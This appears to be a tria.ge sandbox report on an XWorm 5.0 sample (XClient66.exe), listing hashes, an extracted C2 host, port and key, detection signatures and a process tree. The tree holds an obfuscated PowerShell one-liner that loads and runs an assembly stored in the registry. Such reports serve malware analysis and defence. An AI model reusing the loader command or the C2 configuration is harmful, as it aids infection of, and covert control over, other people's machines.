Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09/03/2025, 14:59
Static task
static1
Behavioral task
behavioral1
Sample
XClient66.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
XClient66.exe
Resource
win10v2004-20250217-en
General
-
Target
XClient66.exe
-
Size
501KB
-
MD5
51e015f908d007651a56ba603c142b12
-
SHA1
8fe6b8e61426c8a49a778de6f18ce568d58f2a9d
-
SHA256
a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b
-
SHA512
e598ed359d23173889046499c4093c739a80a044724aae16c4bb483311f0ad80357df7b7dd10f9a6cf12084a4009b18927adde3210ec6bebdf8dd57da997a9ad
-
SSDEEP
12288:EItyU3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:RxkGTy
Malware Config
Extracted
xworm
5.0
client-presence.gl.at.ply.gg:50976
ZVJ9lOsEvNQZTKC6
-
Install_directory
%AppData%
-
install_file
DeadM.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000120fd-5.dat family_xworm behavioral1/memory/3004-8-0x0000000000CD0000-0x0000000000CE0000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2916 created 424 2916 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 4 IoCs
pid Process 3004 DeadMdzj.exe 2952 DeadMdzj.exe 2856 DeadR.exe 2792 DeadR.exe -
pid Process 2916 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2916 set thread context of 2812 2916 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30e955dd0391db01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2916 powershell.EXE 2916 powershell.EXE 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe 2812 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2952 DeadMdzj.exe Token: SeDebugPrivilege 3004 DeadMdzj.exe Token: SeDebugPrivilege 2916 powershell.EXE Token: SeDebugPrivilege 2916 powershell.EXE Token: SeDebugPrivilege 2812 dllhost.exe Token: SeAuditPrivilege 864 svchost.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 1688 wrote to memory of 3004 1688 XClient66.exe 29 PID 1688 wrote to memory of 3004 1688 XClient66.exe 29 PID 1688 wrote to memory of 3004 1688 XClient66.exe 29 PID 1688 wrote to memory of 2952 1688 XClient66.exe 30 PID 1688 wrote to memory of 2952 1688 XClient66.exe 30 PID 1688 wrote to memory of 2952 1688 XClient66.exe 30 PID 1688 wrote to memory of 2856 1688 XClient66.exe 31 PID 1688 wrote to memory of 2856 1688 XClient66.exe 31 PID 1688 wrote to memory of 2856 1688 XClient66.exe 31 PID 1688 wrote to memory of 2856 1688 XClient66.exe 31 PID 1688 wrote to memory of 2792 1688 XClient66.exe 32 PID 1688 wrote to memory of 2792 1688 XClient66.exe 32 PID 1688 wrote to memory of 2792 1688 XClient66.exe 32 PID 1688 wrote to memory of 2792 1688 XClient66.exe 32 PID 2772 wrote to memory of 2916 2772 taskeng.exe 34 PID 2772 wrote to memory of 2916 2772 taskeng.exe 34 PID 2772 wrote to memory of 2916 2772 taskeng.exe 34 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2916 wrote to memory of 2812 2916 powershell.EXE 36 PID 2812 wrote to memory of 424 2812 dllhost.exe 5 PID 2812 wrote to memory of 476 2812 dllhost.exe 6 PID 2812 wrote to memory of 492 2812 dllhost.exe 7 PID 2812 wrote to memory of 500 2812 dllhost.exe 8 PID 2812 wrote to memory of 612 2812 dllhost.exe 9 PID 2812 wrote to memory of 688 2812 dllhost.exe 10 PID 2812 wrote to memory of 768 2812 dllhost.exe 11 PID 2812 wrote to memory of 816 2812 dllhost.exe 12 PID 2812 wrote to memory of 864 2812 dllhost.exe 13 PID 2812 wrote to memory of 976 2812 dllhost.exe 14 PID 2812 wrote to memory of 284 2812 dllhost.exe 15 PID 2812 wrote to memory of 344 2812 dllhost.exe 16 PID 2812 wrote to memory of 1036 2812 dllhost.exe 17 PID 2812 wrote to memory of 1120 2812 dllhost.exe 18 PID 2812 wrote to memory of 1180 2812 dllhost.exe 19 PID 2812 wrote to memory of 1236 2812 dllhost.exe 20 PID 2812 wrote to memory of 316 2812 dllhost.exe 22 PID 2812 wrote to memory of 1700 2812 dllhost.exe 23 PID 2812 wrote to memory of 828 2812 dllhost.exe 24 PID 2812 wrote to memory of 1920 2812 dllhost.exe 25 PID 2812 wrote to memory of 1888 2812 dllhost.exe 26 PID 2812 wrote to memory of 3004 2812 dllhost.exe 29 PID 2812 wrote to memory of 2952 2812 dllhost.exe 30 PID 2812 wrote to memory of 2772 2812 dllhost.exe 33
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:424
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ed9f6622-6a29-4514-82b3-3a23b63759b9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:612
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1700
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:828
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:688
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:768
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1180
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\taskeng.exetaskeng.exe {E4784162-D98D-4F4A-B975-75AE627D5617} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](68)+''+[Char](101)+''+[Char](97)+''+'d'+''+[Char](115)+'t'+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:284
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:344
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1036
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:316
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1920
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1888
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\XClient66.exe"C:\Users\Admin\AppData\Local\Temp\XClient66.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2792
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD5a511516966279868f29c49bba981673b
SHA1d6e9d37f297da33fc7ae15950e8ccd8e5a2b4792
SHA256ac0ca438e575070c22819b08c8048316c722eee872525ece4f724745dee7b8aa
SHA5122712fac1d5972b9aebe97fdaad045b92a30798f1b86eb0f33d63f51abc2f2703237f32d08d6a941b720822b2151e152e437a9294f6017365682dd0d03c5a11bb
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4